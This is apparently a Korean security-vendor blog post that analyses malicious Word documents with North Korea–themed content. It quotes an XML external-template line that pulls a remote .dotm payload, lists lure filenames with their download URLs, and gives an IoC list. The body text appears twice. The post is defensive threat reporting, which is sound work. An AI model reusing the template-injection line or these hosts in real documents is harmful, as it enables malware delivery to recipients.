대북관련 본문 내용의 External 링크를 이용한 악성 워드 문서
Contents
대북관련 본문 내용의 External 링크를 이용한 악성 워드 문서
ASEC 분석팀에서는 다양한 형태의 문서형 악성코드들에 대해 소개해왔다. 그 중에서 대북과 관련한 본문 내용의 악성 문서는 주로 HWP(한글) 형태로 제작되었고 이전 ASEC 블로그에서도 그 내용을 확인 할 수 있다. 이번에 소개할 내용은 대북 관련한 본문 내용이 담긴 악성 DOC(워드) 문서로, ASEC 분석팀에서 확보해온 해당 문서들의 일부를 공개하고자 한다.
메일로 인해 유포되었을 것으로 추정되는 해당 문서들은 아래와 같은 본문 내용을 포함하며, 문서 내부 XML에 작성된 코드에 ‘외부 External 연결 주소’로 접속하여 추가 문서 파일을 다운로드 받는다. XML 내부에 아래 예시와 같이 External로 정의된 외부 URL로 연결할 수 있다. 최근 들어 유포되는 대북관련 문서들에서 공통적으로 이러한 공격기법이 사용되고 있어서 주의가 요구된다.
External 공격 예시 (XML 코드 일부) Target=”hxxp://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6″ TargetMode=”External”/> |
[문서 1] 파일명 : 질의서.docx
● External 연결 주소 : hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6
[문서 2] 파일명 : 업무보고.docx
● External 연결 주소 : hxxp://koreacit.co.kr/skin/new/basic/update/temp?q=6
[문서 3] 파일명 : 북한 8차 당대회 평가와 바이든 .docx
● External 연결 주소 : hxxp://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6
[문서 4] 파일명 : 당대회 …
ASEC 분석팀에서는 다양한 형태의 문서형 악성코드들에 대해 소개해왔다. 그 중에서 대북과 관련한 본문 내용의 악성 문서는 주로 HWP(한글) 형태로 제작되었고 이전 ASEC 블로그에서도 그 내용을 확인 할 수 있다. 이번에 소개할 내용은 대북 관련한 본문 내용이 담긴 악성 DOC(워드) 문서로, ASEC 분석팀에서 확보해온 해당 문서들의 일부를 공개하고자 한다.
메일로 인해 유포되었을 것으로 추정되는 해당 문서들은 아래와 같은 본문 내용을 포함하며, 문서 내부 XML에 작성된 코드에 ‘외부 External 연결 주소’로 접속하여 추가 문서 파일을 다운로드 받는다. XML 내부에 아래 예시와 같이 External로 정의된 외부 URL로 연결할 수 있다. 최근 들어 유포되는 대북관련 문서들에서 공통적으로 이러한 공격기법이 사용되고 있어서 주의가 요구된다.
External 공격 예시 (XML 코드 일부) Target=”hxxp://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6″ TargetMode=”External”/> |
[문서 1] 파일명 : 질의서.docx
● External 연결 주소 : hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6
[문서 2] 파일명 : 업무보고.docx
● External 연결 주소 : hxxp://koreacit.co.kr/skin/new/basic/update/temp?q=6
[문서 3] 파일명 : 북한 8차 당대회 평가와 바이든 .docx
● External 연결 주소 : hxxp://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6
[문서 4] 파일명 : 당대회 …
IoC
http://koreacit.co.kr/skin/new/basic/update/temp?q=6
http://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6
http://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6
https://reform-ouen.com/wp-includes/css/dist/nux/dotm/dwn.php?id=0119
http://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6
http://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6
https://reform-ouen.com/wp-includes/css/dist/nux/dotm/dwn.php?id=0119